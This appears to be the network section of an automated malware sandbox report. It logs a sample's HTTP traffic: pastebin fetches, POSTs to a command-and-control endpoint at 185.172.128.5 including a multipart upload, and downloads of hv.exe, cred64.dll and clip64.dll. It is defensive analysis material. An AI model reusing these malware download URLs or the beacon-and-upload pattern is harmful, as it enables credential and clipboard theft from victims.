Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
pastebin.com | 104.20.67.143 | |

GET 200 https://pastebin.com/raw/A54sKxhY
GET /raw/A54sKxhY HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 11 Dec 2023 22:50:08 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 609
Last-Modified: Mon, 11 Dec 2023 22:39:59 GMT
Server: cloudflare
CF-RAY: 834148ec5962dbd1-LAX

GET 200 https://pastebin.com/raw/A54sKxhY
GET /raw/A54sKxhY HTTP/1.1
Host: pastebin.com
HTTP/1.1 200 OK
Date: Mon, 11 Dec 2023 22:51:09 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 670
Last-Modified: Mon, 11 Dec 2023 22:39:59 GMT
Server: cloudflare
CF-RAY: 83414a670860dbd1-LAX

POST 200 http://185.172.128.5/v8sjh3hs8/index.php
POST /v8sjh3hs8/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.5
Content-Length: 4
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Dec 2023 22:49:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

POST 200 http://185.172.128.5/v8sjh3hs8/index.php?scr=1
POST /v8sjh3hs8/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----MjQyOTU=
Host: 185.172.128.5
Content-Length: 24447
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Dec 2023 22:49:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

POST 200 http://185.172.128.5/v8sjh3hs8/index.php
POST /v8sjh3hs8/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.5
Content-Length: 160
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Dec 2023 22:49:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

GET 200 http://185.172.128.113/hv.exe
GET /hv.exe HTTP/1.1
Host: 185.172.128.113
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Dec 2023 22:49:27 GMT
Content-Type: application/octet-stream
Content-Length: 4129664
Last-Modified: Mon, 11 Dec 2023 17:17:31 GMT
Connection: keep-alive
ETag: "6577442b-3f0380"
Accept-Ranges: bytes

POST 200 http://185.172.128.5/v8sjh3hs8/index.php
POST /v8sjh3hs8/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.5
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Dec 2023 22:49:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

GET 200 http://185.172.128.5/v8sjh3hs8/Plugins/cred64.dll
GET /v8sjh3hs8/Plugins/cred64.dll HTTP/1.1
Host: 185.172.128.5
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Dec 2023 22:49:36 GMT
Content-Type: application/octet-stream
Content-Length: 1257472
Last-Modified: Thu, 07 Dec 2023 13:11:30 GMT
Connection: keep-alive
ETag: "6571c482-133000"
Accept-Ranges: bytes

POST 200 http://185.172.128.5/v8sjh3hs8/index.php
POST /v8sjh3hs8/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.5
Content-Length: 21
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Dec 2023 22:49:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php

GET 200 http://185.172.128.5/v8sjh3hs8/Plugins/clip64.dll
GET /v8sjh3hs8/Plugins/clip64.dll HTTP/1.1
Host: 185.172.128.5
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Dec 2023 22:49:49 GMT
Content-Type: application/octet-stream
Content-Length: 104448
Last-Modified: Thu, 07 Dec 2023 13:11:31 GMT
Connection: keep-alive
ETag: "6571c483-19800"
Accept-Ranges: bytes

POST 200 http://185.172.128.5/v8sjh3hs8/index.php
POST /v8sjh3hs8/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.5
Content-Length: 5
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Dec 2023 22:49:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.101:49186 104.20.67.143:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 55:c8:82:61:30:05:42:80:db:47:5e:d0:66:b5:df:ac:14:5b:19:6f |
Snort Alerts
No Snort Alerts